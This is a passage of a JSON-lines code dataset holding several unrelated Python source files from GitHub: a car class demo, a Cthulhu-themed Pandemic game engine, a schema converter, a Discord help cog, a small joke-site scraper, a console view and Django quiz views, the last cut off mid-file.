regno, no_gears):\n self.regno = regno\n self.no_gears = no_gears\n self.is_started = False\n\n def start(self):\n if self.is_started:\n print(f\"car with reg_no: {self.regno} is already started\")\n else:\n print(f\"car with reg_no: {self.regno} started....\")\n self.is_started = True\n \n def stop(self):\n if self.is_started:\n print(f\"car with reg_no: {self.regno} stopped....\")\n self.is_started = False\n else:\n print(f\"car with reg_no: {self.regno} has already stopped....\")\n \n\n def change_gear(self):\n if self.is_started:\n print(f\"car with reg_no: {self.regno} changed gear....\")\n else:\n print(f\"car with reg_no: {self.regno} has already stopped... can't change gear....\")\n \nif __name__ == \"__main__\":\n bmw = Car(\"KA01300\",5)\n audi = Car(\"KA450067\",6)\n bmw.start()\n bmw.change_gear()\n bmw.stop()\n bmw.stop()\n bmw.change_gear()\n\n audi.start()\n audi.stop()\n audi.change_gear()","repo_name":"Lehan-Max/Python","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2288924513","text":"import sys\nfrom collections import deque\nfrom random import shuffle, choice\n\nfrom .decks import get_old_gods, get_player_relic_decks, get_summon_deck, EvilStirs, RoleManager\nfrom .player import Player\nfrom .printer import print_elder_map\nfrom .utils import PandemicObject, get_input, SKIP_SUMMON, SKIP_SANITY_CHECKS, SEAL_GATE_BASE_COST, \\\n REDUCE_SEAL_COST, DETECTIVE, MAGICIAN, confirm, get_num_players\n\n\nclass GameBoard(object):\n mode = 'cli'\n id = 0\n cultist_reserve = 20\n shoggoth_reserve = 3\n player_deck = None\n player_discards = None\n summon_deck = None\n summon_discards = None\n relic_deck = None\n old_gods = None\n effects = None\n _effect_tracker = None # depreciate by 1 each turn. Allows effect to persist across turns\n players = None\n locations = None\n towns = None\n current_player = None\n current_actions = 4 # will want to use this instead of while loop, eventually\n stream = sys.stdout\n lose_condition = False\n win_condition = True\n\n def __init__(self, num_players=False, stream=None, auto=False):\n self.player_deck = []\n self.player_discards = []\n self.summon_deck = deque([])\n self.summon_discards = []\n self.relic_deck = []\n self.old_gods = []\n self.effects = []\n self.effect_tracker = {}\n self.players = []\n self.locations = {}\n self.towns = []\n self.old_gods = get_old_gods(self)\n self.num_players = num_players\n self.auto = auto\n self.rm = RoleManager()\n\n if stream:\n self.stream = stream\n\n def announce(self, msg):\n \"\"\" The game is only text based now so it just prints to stdout\n\n :param msg: message to print\n :return:\n \"\"\"\n if self.stream:\n print(msg, file=self.stream)\n\n def show_board(self):\n print_elder_map(self)\n\n def _setup_locations(self):\n kingsport = Town('Kingsport')\n innsmouth = Town('Innsmouth')\n dunwich = Town('Dunwich')\n arkham = Town('Arkham')\n kingsport.connections = [innsmouth, dunwich]\n innsmouth.connections = [arkham, kingsport]\n dunwich.connections = [arkham, kingsport]\n arkham.connections = [innsmouth, dunwich]\n self.towns = [arkham, innsmouth, dunwich, kingsport]\n\n locations = [\n Location('Train Station', town=arkham, bus_stop=True, gate=False),\n Location('University', town=arkham, bus_stop=False, gate=False),\n Location('Park', town=arkham, bus_stop=False, gate=True),\n Location('Secret Lodge', town=arkham, bus_stop=False, gate=False),\n Location('Police Station', town=arkham, bus_stop=False, gate=False),\n Location('Diner', town=arkham, bus_stop=True, gate=False),\n Location('Cafe', town=dunwich, bus_stop=False, gate=False),\n Location('Old Mill', town=dunwich, bus_stop=False, gate=True),\n Location('Church', town=dunwich, bus_stop=False, gate=False),\n Location('Farmstead', town=dunwich, bus_stop=False, gate=False),\n Location('Swamp', town=dunwich, bus_stop=False, gate=False),\n Location('Historic Inn', town=dunwich, bus_stop=True, gate=False),\n Location('Great Hall', town=kingsport, bus_stop=False, gate=False),\n Location('Woods', town=kingsport, bus_stop=False, gate=False),\n Location('Market', town=kingsport, bus_stop=True, gate=False),\n Location('Theater', town=kingsport, bus_stop=False, gate=False),\n Location('Wharf', town=kingsport, bus_stop=False, gate=False),\n Location('Graveyard', town=kingsport, bus_stop=False, gate=True),\n Location('Junkyard', town=innsmouth, bus_stop=False, gate=False),\n Location('Pawn Shop', town=innsmouth, bus_stop=False, gate=False),\n Location('Hospital', town=innsmouth, bus_stop=False, gate=True),\n Location('Factory', town=innsmouth, bus_stop=True, gate=False),\n Location('Docks', town=innsmouth, bus_stop=False, gate=False),\n Location('Boardwalk', town=innsmouth, bus_stop=False, gate=False),\n ]\n self.locations = {location.name: location for location in locations}\n\n def add_conn(*args):\n start = args[0]\n conns = args[1:]\n if isinstance(conns, str):\n conns = [conns]\n self.locations[start].connections = [self.locations[conn] for conn in conns]\n\n add_conn('Train Station', 'Cafe', 'University')\n add_conn('University', 'Train Station', 'Park', 'Police Station')\n add_conn('Park', 'University', 'Police Station', 'Secret Lodge')\n add_conn('Police Station', 'University', 'Park', 'Secret Lodge')\n add_conn('Secret Lodge', 'Park', 'Police Station', 'Diner')\n add_conn('Diner', 'Secret Lodge', 'Junkyard')\n add_conn('Cafe', 'Train Station', 'Church')\n add_conn('Old Mill', 'Church')\n add_conn('Church', 'Old Mill', 'Farmstead', 'Cafe', 'Historic Inn')\n add_conn('Farmstead', 'Swamp', 'Church', 'Historic Inn')\n add_conn('Swamp', 'Farmstead', 'Great Hall')\n add_conn('Historic Inn', 'Church', 'Farmstead')\n add_conn('Great Hall', 'Swamp', 'Woods', 'Market')\n add_conn('Woods', 'Great Hall', 'Market', 'Docks')\n add_conn('Market', 'Woods', 'Great Hall', 'Theater', 'Wharf')\n add_conn('Theater', 'Market')\n add_conn('Wharf', 'Market', 'Graveyard')\n add_conn('Graveyard', 'Wharf')\n add_conn('Docks', 'Woods', 'Boardwalk')\n add_conn('Boardwalk', 'Docks', 'Factory')\n add_conn('Factory', 'Hospital', 'Boardwalk')\n add_conn('Hospital', 'Factory', 'Pawn Shop')\n add_conn('Pawn Shop', 'Junkyard', 'Hospital')\n add_conn('Junkyard', 'Diner', 'Pawn Shop')\n\n def _setup_cultists(self):\n cultize = [3, 3, 2, 2, 1, 1]\n for count in cultize:\n draw = self.summon_deck.pop()\n self.summon_discards.append(draw)\n self.locations[draw.name].cultists += count\n self.announce('Placed {} cultist(s) at {}'.format(count, draw.name))\n self.cultist_reserve -= count\n shog = self.summon_deck.pop()\n self.summon_discards.append(shog)\n self.locations[shog.name].shoggoth = 1\n self.shoggoth_reserve -= 1\n self.announce('Placed a shoggoth at {}'.format(shog.name))\n\n def _deal_players(self):\n for player in self.players:\n start = 6 - len(self.players)\n while start:\n player.deal()\n start -= 1\n if player.role == MAGICIAN:\n self.draw_relic_card(player)\n\n def _initialize_evil(self):\n \"\"\" Divide the decks into 4 after players have each been dealt their cards\n Add 1 EvilStirs to each subset\n Shuffle each subset\n Concatenate subsets\n \"\"\"\n decks = [[], [], [], []]\n curr_deck = 0\n while self.player_deck:\n draw = self.player_deck.pop()\n decks[curr_deck % 4].append(draw)\n curr_deck += 1\n while decks:\n deck = decks.pop()\n deck.append(EvilStirs(self))\n shuffle(deck)\n self.player_deck += deck\n\n def _setup(self):\n if not self.num_players:\n get_num_players(self)\n\n if not self.players:\n while self.num_players:\n player = Player(self)\n self.rm.assign_role(player, self.auto)\n self.players.append(player)\n self.num_players -= 1\n self.current_player = self.players[0]\n self.player_deck, self.relic_deck = get_player_relic_decks(self, self.num_players)\n self.summon_deck = get_summon_deck()\n self._setup_locations()\n self._setup_cultists()\n self._deal_players()\n self._initialize_evil()\n\n def seal_cost(self):\n cost = sum([\n SEAL_GATE_BASE_COST,\n -1 * int(REDUCE_SEAL_COST in self.effects),\n ])\n if self.current_player.role == DETECTIVE:\n cost -= 1\n return cost\n\n def seal_gate(self, town):\n town.sealed = True\n for loc in town.locations:\n if loc.cultists:\n loc.cultists -= 1\n self.cultist_reserve += 1\n if REDUCE_SEAL_COST in self.effects:\n self.effects.remove(REDUCE_SEAL_COST)\n self.announce(\n 'The gate in {} has been sealed! Cultists in this town reduced by 1 in each location'.format(town.name))\n self.show_board()\n\n def draw_relic_card(self, player):\n if self.relic_deck:\n relic = self.relic_deck.pop()\n self.announce('{} draws a relic card. {}: {}'.format(player.name(), relic.name, relic.text))\n player.hand.append(relic)\n player.limit_hand()\n\n def draw_player_card(self):\n if self.player_deck:\n return self.player_deck.pop()\n\n def add_cultist(self, location, respect_elder=True):\n town = self.locations[location].town\n if town.elder_sign and respect_elder:\n self.announce('An elder sign prevents a cultist from being added to {}'.format(location))\n elif self.locations[location].cultists == 3:\n # awaken ritual\n self.announce('{} is at cultist capacity - an awakening ritual occurs!'.format(location))\n self.awakening_ritual()\n else:\n self.locations[location].cultists += 1\n\n def sanity_roll(self, player=None):\n if SKIP_SANITY_CHECKS in self.effects:\n self.announce('Active effect precludes the need for a sanity check')\n return\n if not player:\n player = self.current_player\n choices = [(0, 0), # sanity, cultists\n (0, 0),\n (1, 0),\n (1, 0),\n (2, 0),\n (0, 2), ]\n sanity, cultists = choice(choices)\n if sanity:\n self.announce('** {} loses {} sanity **'.format(player.name(), sanity))\n player.sanity = max(0, player.sanity - sanity)\n elif cultists:\n self.announce('** {} summons 2 cultists to {} **'.format(player.name(), player.location))\n self.add_cultist(player.location)\n self.add_cultist(player.location)\n else:\n self.announce('** {} maintains a grip on reality. No effect. **'.format(player.name()))\n\n def awakening_ritual(self):\n for god in self.old_gods:\n if not god.revealed:\n god.revealed = True\n god.activate()\n if god.name != 'Cthulhu':\n confirm()\n break\n\n def reset_states(self):\n if SKIP_SUMMON in self.effects:\n self.effects.remove(SKIP_SUMMON)\n if SKIP_SANITY_CHECKS in self.effects:\n self.effect_tracker[SKIP_SANITY_CHECKS] -= 1\n if self.effect_tracker[SKIP_SANITY_CHECKS] <= 0:\n self.effects.remove(SKIP_SANITY_CHECKS)\n\n def summoning_rate(self):\n if len([god for god in self.old_gods if god.revealed]) > 3:\n return 3\n return 2\n\n def execute_action(self, action, instruction=None):\n self.current_player.execute_action(action, instruction)\n\n def play(self):\n if not self.players:\n self._setup()\n\n self.show_board()\n turn = 0\n while not self.game_over():\n self.current_player = self.players[turn % len(self.players)]\n self.announce('It is now {}\\'s turn (turn {})'.format(self.current_player.name(), turn + 1))\n self.current_player.do_turn()\n self.reset_states()\n self.show_board()\n turn += 1\n\n def discard(self, card):\n self.player_discards.append(card)\n\n def draw_summon(self):\n # rebuild deck if empty. This is not a loss condition\n if not self.summon_deck:\n discards = self.summon_discards\n shuffle(discards)\n self.summon_deck = deque(discards)\n self.summon_discards = []\n summon = self.summon_deck.pop()\n self.summon_discards.append(summon)\n self.announce('Summon deck draw: {}'.format(summon.name))\n self.add_cultist(summon.name)\n self.cultist_reserve -= 1\n if summon.shoggoths:\n self.move_shoggoths()\n\n def gate_distance(self, loc, visited=None):\n if not visited:\n visited = []\n if [_conn for _conn in loc.connections if _conn.gate and not _conn.town.sealed]:\n return 1\n visited.append(loc)\n paths = [self.gate_distance(_conn, visited) for _conn in loc.connections if _conn not in visited]\n paths = [path for path in paths if path] # dead end path is 0\n if paths:\n distance = 1 + min(paths)\n return distance\n return 999 # deadend\n\n def move_shoggoths(self, automate=False):\n \"\"\" Shoggoths move to the closest gate\n\n Special cases: 1. If two or more options are equidistant from a gate, player chooses\n 2. If shoggoth is on a gate, trigger an awakening ritual\n \"\"\"\n\n awaken = 0 # delay until current shoggoths move, in case one activates Hastor\n # TODO - test that this works with multiple shoggoths on one location\n for location in self.get_shoggoth_sites():\n if location.shoggoth:\n location.shoggoth -= 1\n if location.gate and not location.town.sealed:\n self.announce(\n 'The Shoggoth at {} enters the gate, triggering an awakening ritual'.format(location.name))\n awaken += 1\n self.shoggoth_reserve += 1\n else:\n opts = {}\n for conn in location.connections:\n if conn.gate and not conn.town.sealed:\n opts[0] = [conn]\n else:\n dist = self.gate_distance(conn)\n opts.setdefault(dist, [])\n opts[dist].append(conn)\n\n opts = opts[min(opts.keys())]\n if len(opts) == 1:\n opts[0].shoggoth += 1\n self.announce('Shoggoth moves from {} to {}'.format(location.name, opts[0].name))\n for player in self.players:\n if player.location == opts[0].name:\n self.announce('Shoggoth enters the location of {}, performing a sanity roll'.format(\n player.name()))\n self.sanity_roll(player)\n else:\n if automate:\n destination = opts[0]\n else:\n destination = get_input(opts, 'name', 'Shoggoth move options at {} are equidistant. '\n 'Current player chooses'.format(location.name))\n destination.shoggoth += 1\n for player in self.players:\n if player.location == destination.name:\n self.announce('Shoggoth enters the location of {}, performing a sanity roll'.format(\n player.name()))\n self.sanity_roll(player)\n self.announce('Shoggoth moves from {} to {}'.format(location.name, destination.name))\n for i in range(awaken):\n self.awakening_ritual()\n\n def move_player(self, location):\n \"\"\" Moves player to a location and checks for Shoggoth\n\n :return: None\n \"\"\"\n player = self.current_player\n player.location = location\n self.announce('{} moves to {}'.format(player.name(), location))\n if self.locations[player.location].shoggoth:\n self.announce('You\\'ve entered a location with a shoggoth. Performing a sanity roll...')\n self.sanity_roll()\n self.show_board()\n\n def get_shoggoth_sites(self):\n locs = []\n for location in self.locations.values():\n # if multiple shoggoths, add the location for each\n sites = [location] * location.shoggoth\n if sites:\n locs += sites\n return locs\n\n def summon_shoggoth(self):\n if not self.summon_deck:\n self.regroup_cultists()\n summon = self.summon_deck.popleft()\n town = self.locations[summon.name].town\n if town.elder_sign:\n self.announce('An elder sign prevents a shoggoth from being summoned to {}'.format(summon.name))\n else:\n self.announce('A Shoggoth has been summoned at {}'.format(summon.name))\n self.shoggoth_reserve -= 1\n if self.shoggoth_reserve < 0:\n return # stop here\n self.summon_discards.append(summon)\n self.locations[summon.name].shoggoth += 1\n for player in self.players:\n if player.location == summon.name:\n self.sanity_roll(player)\n return summon.name\n\n def regroup_cultists(self):\n discards = self.summon_discards\n shuffle(discards)\n self.summon_deck += discards\n self.summon_discards = []\n\n def game_over(self):\n sealed = [town for town in self.towns if town.sealed]\n if len(sealed) == 4:\n self.announce('The game is over. You have won!')\n return True\n\n loss_condition = None\n # TODO - this really isn't a problem unless they need to use a cultist/draw/shogg. We should just have an\n # attribute that the things using this can check\n if self.cultist_reserve < 0:\n loss_condition = 'Not enough cultists in reserve.'\n if self.shoggoth_reserve < 0:\n loss_condition = 'Not enough shoggoths in reserve.'\n if self.old_gods[-1].revealed:\n loss_condition = self.old_gods[-1].text\n if not any([player.sanity for player in self.players if player.sanity > 0]):\n loss_condition = 'All players are insane.'\n if not self.player_deck:\n loss_condition = 'Player deck has been depleted.'\n\n if loss_condition:\n self.announce('You have lost: {}'.format(loss_condition))\n return True\n\n\nclass Town(PandemicObject):\n connections = None\n sealed = False\n elder_sign = False\n locations = None\n\n def __init__(self, name):\n super(Town, self).__init__(name)\n self.connections = []\n self.locations = []\n\n\nclass Location(PandemicObject):\n bus_stop = False\n cultists = 0\n connections = None\n gate = False\n town = None\n shoggoth = 0 # could technically have multiple\n\n def __init__(self, name, town, bus_stop=False, gate=False):\n super(Location, self).__init__(name)\n self.town = town\n self.connections = []\n if self not in town.locations:\n town.locations.append(self)\n self.bus_stop = bus_stop\n self.gate = gate\n","repo_name":"ewohnlich/esoth.pandemic-cthulhu","sub_path":"esoth/pandemic_cthulhu/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":19414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44130639794","text":"\"\"\"Switchboard module\"\"\"\n# pylint: disable=too-few-public-methods\nfrom .cords import Cord\nfrom .diggable import Diggable\nfrom .exceptions import SwitchboardMissingFieldException\n\n\nclass Switchboard:\n \"\"\"Switchboard objects helps converting JSON schemas.\n Switchboard consists of cords that can define how data\n list moved from schema to schema.\n \"\"\"\n\n OPTIONS_CLASS = \"Meta\"\n\n # Missing data options\n EXCLUDE = \"EXCLUDE\"\n INCLUDE = \"INCLUDE\"\n RAISE = \"RAISE\"\n\n # Attributes\n _options = None\n _many = None\n\n def __init__(self, many=False):\n self._many = many\n self._options = {\"missing\": self.INCLUDE, **self._get_options()}\n\n def _get_options(self):\n _options = {}\n _meta = getattr(self, self.OPTIONS_CLASS, None)\n\n for attr_name in dir(_meta):\n if not attr_name.startswith(\"__\"):\n _options[attr_name] = getattr(_meta, attr_name)\n\n return _options\n\n def _get_cords(self):\n _cords = {}\n for attr_name in dir(self):\n attr = getattr(self, attr_name)\n if isinstance(attr, Cord):\n _cords[attr_name] = attr\n return _cords\n\n def _apply_for_object(self, data):\n new_data = {}\n diggable = Diggable(data)\n\n for cord_name, cord_inst in self._get_cords().items():\n value, is_found = cord_inst.apply(diggable)\n\n if not is_found and self._options[\"missing\"] is self.EXCLUDE:\n continue\n\n if not is_found and self._options[\"missing\"] is self.RAISE:\n raise SwitchboardMissingFieldException(\n f'Field \"{cord_name}\" is missing'\n )\n\n new_data[cord_name] = value\n\n return new_data\n\n def apply(self, data):\n \"\"\"Switchboard is applied via this method.\n \"\"\"\n\n if self._many:\n return list(map(self._apply_for_object, data))\n\n return self._apply_for_object(data)\n","repo_name":"juhoen/Switchboard","sub_path":"switchboard/switchboard.py","file_name":"switchboard.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9200551489","text":"import discord\nfrom typing import List, Dict\nfrom discord.ext import commands\nfrom discord.commands import Option, SlashCommandGroup, SlashCommand, command\nfrom ..package_manager import PackageManager\nfrom src.XEMB.XEMB_parser import XEmbed, XEMBParser\n\n\n# ------------------------------------------------------------------------------\n\n\ndef get_all_components(prefix: str) -> Dict[str, XEmbed]:\n pm = PackageManager(None)\n cmds = {}\n for pkg in filter(lambda p: p.docs, pm.all_packages):\n xembeds = pkg.docs_parser.parse_all()\n xembeds = {n.replace(prefix, \"\"): e for n, e in xembeds.items()\n if n.startswith(prefix)}\n for ename, xembed in xembeds.items():\n cmds[f\"{ename}\"] = xembed\n return cmds\n\n\ndef get_all_manuals(other_path: str) -> Dict[str, XEmbed]:\n \"\"\"Возвращает все пакетные мануалы, а также мануалы из other_path\"\"\"\n mans = get_all_components(\"man-\")\n mans.update(XEMBParser(other_path).parse_all())\n return mans\n\n\ndef get_cmd_opt() -> Option:\n cmds = get_all_components(\"cmd-\")\n opt = Option(str, \"О какой команде вывести справку.\", required=True,\n choices=cmds.keys())\n if not cmds:\n opt.description = \"Команд нет или у пакетов, содержащих их, отсутствует\\\n документация\"\n return opt\n\n\ndef get_man_opt() -> Option:\n mans = get_all_manuals(\"xml/help.xml\")\n opt = Option(str, \"Выберете мануал для прочтния\", required=True,\n choices=mans.keys())\n if not mans:\n opt.description = \"Мануалов нет или у пакетов, содержащих их, \\\nотсутствует документация\"\n return opt\n\n\n# ------------------------------------------------------------------------------\n\n\nclass Help(commands.Cog):\n helps = SlashCommandGroup(\"help\", \"desc\", guild_ids=[634453910236561419])\n\n def __init__(self, bot):\n self.bot = bot\n self.pm = PackageManager(bot)\n self._cmd_cache = get_all_components(\"cmd-\")\n self._man_cache = get_all_manuals(\"xml/help.xml\")\n \n @command()\n async def help(self, ctx, man: get_man_opt()=\"Про Кенни\"):\n \"\"\"Выводит справку о чём-либо\"\"\"\n if man not in self._man_cache: \n await ctx.delete()\n return\n await ctx.respond(embed=self._man_cache[man])\n\n @helps.command()\n async def command(self, ctx, cmd: get_cmd_opt()):\n \"\"\"Выводит справку по команде\"\"\"\n if cmd not in self._cmd_cache: \n await ctx.delete()\n return\n await ctx.respond(embed=self._cmd_cache[cmd])\n\ndef setup(bot):\n bot.add_cog(Help(bot))\n","repo_name":"DarkSeriusCode/Kenny","sub_path":"pkgman/help/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34632771726","text":"# encoding = utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import pool\nimport time\nimport os\nimport json\nimport loguru\nimport re\n\n# from queue import Queue # 用于多线程消息队列(url消费者)\n\nlogger = loguru.logger\n\n\ndef get_page(url):\n response = requests.get(url)\n if response.status_code != 200:\n return None\n html = response.text\n return html\n\n\ndef parse_page(html):\n if html is None:\n return\n soup = BeautifulSoup(html, 'lxml')\n box = soup.find('div', id=\"footzoon\")\n title_list = box.find_all('h3', class_='red')\n content_list = box.find_all('div', id='endtext')\n date_click_list = box.text.strip().split('糗事百科')[1:]\n\n for title, content, date_click in zip(title_list, content_list, date_click_list):\n joke = dict()\n joke['title'], joke['content'] = title.text.strip(), content.text.strip()\n try:\n joke['date'] = date_click.split()[0]+date_click.split()[1]\n joke['click'] = re.match(\n r\"Click:(\\d+).*?\", date_click.split()[2]).group(1)\n except Exception as e:\n continue\n yield joke\n\n\ndef crawl(url):\n html = get_page(url.format(i))\n jokes = parse_page(html)\n for joke in jokes:\n local_fp = open('qsbk_multi.json', 'a', encoding='utf-8')\n local_fp.write(json.dumps(joke))\n local_fp.write('\\n')\n local_fp.close()\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n start = time.time()\n url = \"http://www.lovehhy.net/Joke/Detail/QSBK/{}\"\n url_list = []\n for i in range(1, 5):\n url_list.append(url.format(i))\n pool = pool.Pool()\n pool.map(crawl, url_list)\n print(time.time()-start)","repo_name":"ilyi1116/python3_course_code","sub_path":"并发爬取糗事百科笑话(官网升级中)/多线程.py","file_name":"多线程.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27797815217","text":"from lib.game.enums import SignalLevel\nfrom lib.game.state.components import DetectorState\nfrom view.console.components import ComponentView\nfrom view.console.controls import DirectionLabel\nfrom view.console.screen import Screen\n\n\nclass _Texts:\n NO_TARGETS_MESSAGE = 'Вы не чувствуете ничего необычного.'\n DETECTOR_MESSAGE = 'В направлении на {direction} что-то есть.'\n SIGNAL_MESSAGE = {\n SignalLevel.Low: 'Вы едва ощущаете это.',\n SignalLevel.Average: 'Это явно чувствуется.',\n SignalLevel.High: 'Вы совершенно уверены в этом.',\n }\n\n\nclass DetectorView(ComponentView[DetectorState]):\n def render(self, state: DetectorState):\n messages = []\n if state.targets:\n for target in state.targets:\n direction_label = DirectionLabel(target.direction)\n messages.append(_Texts.DETECTOR_MESSAGE.format(direction=direction_label))\n messages.append(_Texts.SIGNAL_MESSAGE[target.signal_level])\n else:\n messages.append(_Texts.NO_TARGETS_MESSAGE)\n\n return Screen.join(messages)\n","repo_name":"janscf/angry_oleg","sub_path":"view/console/components/detector_view.py","file_name":"detector_view.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6861063868","text":"from re import sub\nfrom django.shortcuts import render\nfrom general.models import Subject_Assignment, Subject\nfrom .models import Quiz,Attempt,On_Test,Assignment,Question\nfrom django.views.generic.list import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic.detail import SingleObjectMixin\nfrom datetime import datetime, date, timedelta\nfrom django.http import HttpResponse, JsonResponse\nfrom django.utils import timezone\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom general.views import is_student, is_stud_faculty_user, is_faculty\nfrom django.shortcuts import redirect\nimport json\nfrom django.views.generic.edit import FormView\nfrom django.db.models import Q\nfrom .forms import QuizForm,ResponseForm\nfrom django.template.loader import render_to_string\n# Create your views here.\n\nclass QuizListView(LoginRequiredMixin,ListView):\n model=Quiz\n login_url = 'login'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['now'] = timezone.now()\n \n return context\n \n def get_queryset(self):\n #stud = request.user.student\n attempted = Attempt.objects.filter(user=self.request.user).values_list('Quiz',flat=True)\n subjects = Subject_Assignment.objects.filter(programme__department__degree_category__id=self.request.user.student.department.degree_category.id).values_list('id',flat=True)\n return Quiz.objects.filter(subjects__in=subjects,openDate__lte=datetime.today(), closeDate__gte=datetime.today()).order_by('-openDate').exclude(id__in=attempted)\n \n\n\nclass QuizDetail(SingleObjectMixin,LoginRequiredMixin,ListView):\n paginate_by = 1\n template_name = \"quiz/quiz_detail.html\"\n login_url = 'login'\n \n def get(self, request, *args, **kwargs):\n current_user = request.user\n \n if Attempt.objects.filter(user=self.request.user,Quiz=self.kwargs['pk']).values_list('Quiz',flat=True).exists():\n return HttpResponse(\"No More attempts allowed\") \n\n if not On_Test.objects.filter(user=request.user).exists():\n On_Test.objects.create(user=request.user,test_id=self.kwargs['pk'],started_time=datetime.now())\n\n old_one=[]\n\n current_test=Quiz.objects.get(id=self.kwargs['pk'])\n old_test=On_Test.objects.get(user=request.user) \n \n if current_test.id == old_test.test.id:\n if not current_test.timed_exam:\n self.mins = None\n self.seconds = None\n\n else:\n then = old_test.started_time\n now = datetime.strptime(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),'%Y-%m-%d %H:%M:%S') \n diff = (now - then).total_seconds() \n self.mins = current_test.duration_in_minutes - ((diff // 60) + 1)\n self.seconds = 59 - diff % 60\n\n if request.user.groups.filter(name='Student').exists():\n self.object = self.get_object(queryset=Quiz.objects.filter((Q(subject_assignment__programme__department__degree_category__id=request.user.student.programme.department.degree_category.id)), openDate__lte=date.today(), closeDate__gte=date.today()))\n print(\"self\",self.object)\n \n elif request.user.groups.filter(name='faculty').exists():\n subjects = request.user.faculty\n self.object = self.get_object(queryset=Quiz.objects.filter((Q(subject_assignment__programme__department__degree_category__id=request.user.faculty.programme.department.degree_category.id)),openDate__lte=date.today(), closeDate__gte=date.today()).distinct())\n\n self.questions=list(Assignment.objects.filter(Quiz=self.object.id).values_list('Question_id', flat=True))\n self.assignment = Assignment.objects.get(Quiz=self.object.id,Question=self.questions[0])\n print(\"s-q\",self.questions)\n\n else:\n return render(request, 'quiz/old_test.html', {'old_test':old_test,'current_test':current_test,})\n \n\n return super().get(request, *args, **kwargs)\n\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context={\n 'quiz' : self.object,\n 'question_count' : len(self.questions),\n 'question_no' : 0,\n 'assignment' : self.assignment,\n 'questions' : self.questions,\n 'question_next' : 1,\n 'question_prev' : -1,\n 'mins':self.mins,\n 'seconds':self.seconds,\n \n \n } \n return context\n \n \n def get_queryset(self): \n return \"Query set\"\n \n \n def post(self,request, *args, **kwargs): \n return HttpResponseRedirect('/')\n\n@login_required(login_url='login')\ndef quiz_load_question(request):\n data = dict()\n no = int(request.GET.get('question_no'))\n test = request.GET.get('test')\n \n #get test questions\n test_object=Quiz.objects.get(id=test)\n\n questions=list(Assignment.objects.filter(Quiz=test_object).values_list('Question_id', flat=True))\n \n assignment = Assignment.objects.get(Quiz=test_object,Question=questions[no])\n \n \n context={ \n\n 'assignment' : assignment,\n 'test':test_object,\n 'question_no': no, \n \n }\n print(\"no\",assignment)\n data['question'] = render_to_string('quiz/quiz_questions_fly.html', context)\n print(\"no\",data['question']) \n data['question_no'] = no\n data['question_id'] = assignment.Question.id\n data['question_count'] = len(questions)\n\n return JsonResponse(data)\n\n\n\n\n@login_required(login_url='login') #Authentication\n@user_passes_test(is_stud_faculty_user,login_url='login') #Authorization \ndef quizsubmit(request):\n json_data=json.loads(request.body.decode('utf-8'))\n data = dict()\n current_user = request.user\n quiz_id=int(json_data[0]['quizid'])\n \n quiz = Quiz.objects.get(id=quiz_id) \n if len(json_data)==1 and not 'questionid' in json_data[0]:\n Attempt.objects.create(user=current_user,Quiz=quiz,score=0)\n score=0\n On_Test.objects.filter(user=current_user,test=quiz).delete()\n else:\n score = Attempt.Create(quiz_id,current_user,json_data)\n \n data['score'] = score\n return JsonResponse(data)\n\n@login_required(login_url='login') #Authentication\n@user_passes_test(is_stud_faculty_user,login_url='login') #Authorization\ndef my_scores(request):\n if is_student(request.user):\n subjects = Subject_Assignment.objects.filter(programme=request.user.student.programme,semester=request.user.student.semester,year=request.user.student.year)\n Attempts = Attempt.objects.filter(user=request.user,Quiz__subject_assignment__in=subjects.all()).order_by('-date').distinct()\n elif is_faculty(request.user): \n subjects= request.user.faculty.programme.title\n print(subjects)\n #Attempts = Attempt.objects.filter(user=request.user,Quiz__subject_assignment__programme__title__in=subjects).order_by('-date').distinct()\n Attempts = Attempt.objects.filter(user=request.user).order_by('-date').distinct()\n print(Attempts)\n return render(request,'quiz/my_scores.html',{'Attempts':Attempts,'subjects':subjects})\n \n@login_required(login_url='login') #Authentication\n@user_passes_test(is_stud_faculty_user,login_url='login') #Authorization\ndef filter_scores(request):\n data = dict()\n subject = request.GET.get('subject')\n print(\"scorefilter\")\n Attempts = Attempt.objects.filter(user=request.user,Quiz__subject_assignment=subject).order_by('-date')\n data['html_scores'] = render_to_string('quiz/scores.html',{'Attempts':Attempts},request=request)\n return JsonResponse(data)\n\nclass QuizView(FormView):\n template_name = 'quiz/addquiz.html'\n form_class = QuizForm\n success_url = '/'\n model=Quiz\n\n \n def form_valid(self, form): \n form.save()\n return super().form_valid(form)\n\ndef manage_quiz(request,quiz_id):\n '''author = Assignment.objects.get(Quiz__id=quiz_id)\n QuizInlineFormSet = inlineformset_factory(Assignment, Response, fields=('option',))\n if request.method == \"POST\":\n formset = BookInlineFormSet(request.POST, request.FILES, instance=author)\n if formset.is_valid():\n formset.save()\n # Do something. Should generally end with a redirect. For example:\n return HttpResponseRedirect(author.get_absolute_url())\n else:\n formset = BookInlineFormSet(instance=author)\n return render(request, 'manage_books.html', {'formset': formset})'''\n'''@login_required(login_url='login')\ndef ques_upload(request):\n if request.user.username == \"admin\":\n if \"GET\" == request.method:\n return render(request, 'quiz/quest.html', {})\n else:\n excel_file = request.FILES[\"excel_file\"]\n\n # you may put validations here to check extension or file size\n\n wb = openpyxl.load_workbook(excel_file)\n\n # getting a particular sheet by name out of many sheets\n worksheet = 